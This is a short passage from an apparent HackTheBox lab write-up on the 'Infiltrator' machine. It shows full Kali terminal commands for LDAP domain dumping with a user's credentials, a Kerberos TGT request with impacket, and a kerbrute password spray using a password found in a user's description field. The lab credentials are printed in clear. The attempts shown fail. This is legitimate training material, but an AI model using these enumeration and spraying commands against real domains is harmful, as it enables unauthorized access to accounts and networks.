LDAPDomainDump
┌──(kali㉿kali)-[~/…/htb/labs/infiltrator/ldapdomaindump]
└─$ ldapdomaindump dc01.infiltrator.htb -u 'INFILTRATOR.HTB\l.clark' -p 'WAT?watismypass!' -n $IP --no-json --no-grep
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finishedDumping domain information using the credential of the l.clark user
Computers
Users
another additional account found; lan_management
More importantly, there is what appears to be a password in the description field of the k.turner user
MessengerApp@Pass!
Validation (failed)
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-getTGT INFILTRATOR.HTB/k.turner@dc01.infiltrator.htb -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: MessengerApp@Pass!
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)Validation Failed
Password Spray
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ kerbrute passwordspray --dc dc01.infiltrator.htb -d INFILTRATOR.HTB users.txt 'MessengerApp@Pass!'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/01/24 - Ronnie Flathers @ropnop
2024/09/01 00:54:18 > Using KDC(s):
2024/09/01 00:54:18 > dc01.infiltrator.htb:88
2024/09/01 00:54:18 > Done! Tested 12 logins (0 successes) in 0.101 secondsPassword spray failed
MessengerApp@Pass! does not belong to domain users
Groups
